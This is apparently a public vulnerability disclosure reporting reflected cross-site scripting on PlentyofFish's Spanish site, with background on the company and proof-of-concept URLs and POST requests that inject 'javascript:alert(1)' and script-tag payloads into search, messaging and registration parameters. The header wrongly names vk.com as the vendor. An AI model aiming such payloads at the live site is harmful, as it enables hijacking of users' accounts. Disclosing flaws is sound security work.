# Exploit Title :PlentyofFish (POF) Cross Site Scripting ( Reflected) # *Vendor*: www.vk.com # Author: Juan Carlos Garca (NightSec) # Blog: http://hackingmadrid.blogspot.com # Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196 ******************* BREIF DESCRIPTION ****************** PlentyofFish (POF) is an online dating site, popular primarily in Canada, the United Kingdom, Australia, Brazil and the United States.The company, based in Vancouver, British Columbia generates revenue through advertising. While it is free to use, POF offers premium services as part of their upgraded membership, such as seeing the date and time a user viewed your profile and allowing you to see whether a user read and/or deleted your message. According to Compete.com's site traffic tracking, Plentyoffish attracted 5.3 million visitors in February 2011 On January 21, 2011, it was discovered that the PlentyofFish website had been hacked which exposed the personal and password information on nearly 30 million user accounts.[19] Since the alleged hacking incident, Frind alleges he has identified persons he believes are responsible for the hacking, and alleges he is threatening legal action in response to the widespread negative media exposure. At the time this received global media exposure and security experts blame PlentyofFish for the security and privacy lapse specifically for keeping user's passwords unsecured.[19][20] On February 28, 2012, the parents of US Army Lieutenant Peter Burks sued PlentyofFish. The parents' lawsuit alleges photos of their son, who was killed in Iraq in 2007, were used without permission. The parents are seeking compensatory and punitive damages. ****************** The Flaw ******* Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology. When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise. Proof Of Concept ( PoC) ******************* www.pof.com/es_basicsearch.aspx?iama=javascript:alert(1);&minage=30&maxage=42&z_code=28030&state=1696&city=Madrid&seekinga=f&ethnicity=0&sorting=0&miles=100&country=82&imagesetting=1&page=1&count=600'> http://www.pof.es/es_basicsearch.aspx?count=229&country=1&ethnicity=13&iama=f&imagesetting=javascript:alert(1);&maxage=35&miles=100&minage=25&page=26&searchtype=1&seekinga=m&sorting=0&starsign=1&state=1&viewtype=0 http://www.pof.es/es_basicsearch.aspx?Profession&cmdSearch=B%C3%BAsqueda&country=1&ethnicity=13&iama=javascript:alert(1);&maxage=35&millas=35&minage=25&save=1&searchtype=1&seekinga=m&starsign=1&state=1&viewtype=0&z_code=+ http://www.pof.es/es_sendmessage.aspx?p_id=50890764&sendto=Silvi76&submit=Enviar!&usersendto=55590685&v=%3Cscript%3Ealert(%22xss%22)%3C/script%3E POST http://www.pof.es/es_register.aspx?SID=ybbnrf5ur51cmxq5xvuce2es&callbackDomain=http%3A%2F%2Fwww.pof.es keyval=HACK&Password=HACK&UserName=HACK&Email=HACK&PasswordConfirm=HACK&gender=1&birthday=02&birthmonth=2&birthyear=1994&country=82&ethnicity=2&EmailB=HACK&key=mywvljtf0aafnhlne1ds2ele&rand=34293&bvadoftn=ON&action=RegSubmit&Submit=Go+To+Second+Step&Submit.x=&Submit.y= POST http://www.pof.es/es_seduction2.aspx gender=0&meet=1&f1=1&f2=1&f3=1&f4=1&f5=1&f6=1&f7=1&f8=1&f9=1&f10=1&f11=1&desire=2&A1=1&A2=1&A3=1&A4=1&A5=1&A6=1&A7=1&A8=1&A9=1&A10=1&A11=1&A12=1&A13=1&A14=1&A15=1&A16=1&A17=1&A18=1&A19=1&A20=1&A21=1&A22=1&A23=1&A24=1&A25=1&A26=1&A27=1&A28=1&A29=1&A30=1 POST http://www.pof.es/es_register.aspx?SID=w5dkgceq1k2gj30fwf4alfrg&callbackDomain=http%3A%2F%2Fwww.pof.es dvlhqjh=ZAP&vttgsrp=&PasswordConfirm=&nlqtptai=ZAP&EmailB=ZAP&birthmonth=2&birthday=02&birthyear=1994&gender=1&ethnicity=2&country=82&rand=464591&key=w5dkgceq1k2gj30fwf4alfrg&keyval=ZAP&ohpgfiof=&rand_submit=464591&adnoagd=ON&wool=1&action=RegSubmit&Submit=Go+To+Second+Step&Submit.x=&Submit.y=